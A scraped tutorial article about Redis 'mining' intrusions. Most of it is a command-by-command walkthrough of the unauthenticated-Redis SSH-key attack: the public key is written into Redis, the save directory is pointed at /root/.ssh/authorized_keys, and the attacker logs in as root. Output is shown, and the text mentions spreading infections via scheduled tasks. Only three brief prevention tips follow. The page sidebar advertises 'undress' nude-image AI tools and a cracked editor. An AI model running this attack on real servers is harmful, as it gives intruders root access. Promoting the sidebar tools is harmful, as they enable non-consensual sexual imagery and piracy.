DatabaseRedisA brief analysis of the principles of Redis mining and how to prevent it (skill sharing)A brief analysis of the principles of Redis mining and how to prevent it (skill sharing)
This article will talk about the principles of Redis mining, see how to prevent it, and share prevention techniques. I hope it will be helpful to everyone!
The author has also been attacked by a mining virus, which was very uncomfortable, but in fact, as long as you understand the means of intrusion, it is very easy to prevent it. Today we will demonstrate how to pass Redis performs privilege escalation to obtain the Root user of the remote server. [Related recommendations: Redis Video Tutorial]
1. First we need some prerequisites
Condition 1: You First, there must be a Redis, and we must know its port [default 6379];
Condition 2: The password of Redis cannot be too complex, or there is no password;
Condition 3: The user who starts Redis is preferably a Root user, which will be more destructive;
2. Start making trouble
- 2.1 Create a pair of secret keys
Generate a pair through ssh-keygen. Of course, you can use the existing ones without any problem.
root@kali:/usr/local/src# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa
Next, the attack key value is generated through the public key.
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
The content is as follows
root@kali:/tmp/rediskey# cat foo.txt ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
The purpose of adding two newlines before and after here is to prevent the data from being connected together and causing failure problems.
- 2.2 Configure Key to Redis
The operation is as follows:
root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar OK
Log in to Redis to check whether it has been written into Redis.
root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129 192.168.243.129:6379> get bar "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
- 2.3 Replace system files through the Redis saving mechanism
Let’s see the following operations
192.168.243.129:6379> config set dir /root/.ssh OK 192.168.243.129:6379> config get dir 1) "dir" 2) "/root/.ssh" 192.168.243.129:6379> config set dbfilename "authorized_keys" OK 192.168.243.129:6379> save OK 192.168.243.129:6379> exit
At this time, we log in remotely Check the effect on the host.
root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129 The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established. ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts. Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64 Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1 root@kali:~# w
OK, we have successfully escalated our rights here, so let’s take a look at what the exported file is? In fact, it is just the saved file form of Redis. If you are interested, you can open it yourself and have a look. It will not be shown here.
3. How to prevent
This vulnerability is quite powerful. We only have one host permission now, add it to the scheduled task to execute some scripts, and then What about batch infections?
Tips for prevention are as follows:
Redis should not listen on dangerous IPs. If so, please add firewall control;
Redis must increase password restrictions, and it cannot be a weak password;
Try not to start Redis as the Root user.
Follow the above three points to prevent Redis mining, no problem
For more programming-related knowledge, please visit:Introduction to Programming! !
The above is the detailed content of A brief analysis of the principles of Redis mining and how to prevent it (skill sharing). For more information, please follow other related articles on the PHP Chinese website!
Redis's Role: Exploring the Data Storage and Management CapabilitiesApr 22, 2025 am 12:10 AMRedis plays a key role in data storage and management, and has become the core of modern applications through its multiple data structures and persistence mechanisms. 1) Redis supports data structures such as strings, lists, collections, ordered collections and hash tables, and is suitable for cache and complex business logic. 2) Through two persistence methods, RDB and AOF, Redis ensures reliable storage and rapid recovery of data.
Redis: Understanding NoSQL ConceptsApr 21, 2025 am 12:04 AMRedis is a NoSQL database suitable for efficient storage and access of large-scale data. 1.Redis is an open source memory data structure storage system that supports multiple data structures. 2. It provides extremely fast read and write speeds, suitable for caching, session management, etc. 3.Redis supports persistence and ensures data security through RDB and AOF. 4. Usage examples include basic key-value pair operations and advanced collection deduplication functions. 5. Common errors include connection problems, data type mismatch and memory overflow, so you need to pay attention to debugging. 6. Performance optimization suggestions include selecting the appropriate data structure and setting up memory elimination strategies.
Redis: Real-World Use Cases and ExamplesApr 20, 2025 am 12:06 AMThe applications of Redis in the real world include: 1. As a cache system, accelerate database query, 2. To store the session data of web applications, 3. To implement real-time rankings, 4. To simplify message delivery as a message queue. Redis's versatility and high performance make it shine in these scenarios.
Redis: Exploring Its Features and FunctionalityApr 19, 2025 am 12:04 AMRedis stands out because of its high speed, versatility and rich data structure. 1) Redis supports data structures such as strings, lists, collections, hashs and ordered collections. 2) It stores data through memory and supports RDB and AOF persistence. 3) Starting from Redis 6.0, multi-threaded I/O operations have been introduced, which has improved performance in high concurrency scenarios.
Is Redis a SQL or NoSQL Database? The Answer ExplainedApr 18, 2025 am 12:11 AMRedisisclassifiedasaNoSQLdatabasebecauseitusesakey-valuedatamodelinsteadofthetraditionalrelationaldatabasemodel.Itoffersspeedandflexibility,makingitidealforreal-timeapplicationsandcaching,butitmaynotbesuitableforscenariosrequiringstrictdataintegrityo
Redis: Improving Application Performance and ScalabilityApr 17, 2025 am 12:16 AMRedis improves application performance and scalability by caching data, implementing distributed locking and data persistence. 1) Cache data: Use Redis to cache frequently accessed data to improve data access speed. 2) Distributed lock: Use Redis to implement distributed locks to ensure the security of operation in a distributed environment. 3) Data persistence: Ensure data security through RDB and AOF mechanisms to prevent data loss.
Redis: Exploring Its Data Model and StructureApr 16, 2025 am 12:09 AMRedis's data model and structure include five main types: 1. String: used to store text or binary data, and supports atomic operations. 2. List: Ordered elements collection, suitable for queues and stacks. 3. Set: Unordered unique elements set, supporting set operation. 4. Ordered Set (SortedSet): A unique set of elements with scores, suitable for rankings. 5. Hash table (Hash): a collection of key-value pairs, suitable for storing objects.
Redis: Classifying Its Database ApproachApr 15, 2025 am 12:06 AMRedis's database methods include in-memory databases and key-value storage. 1) Redis stores data in memory, and reads and writes fast. 2) It uses key-value pairs to store data, supports complex data structures such as lists, collections, hash tables and ordered collections, suitable for caches and NoSQL databases.
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
SecLists
SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.
WebStorm Mac version
Useful JavaScript development tools
Atom editor mac version download
The most popular open source editor
EditPlus Chinese cracked version
Small size, syntax highlighting, does not support code prompt function
DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software
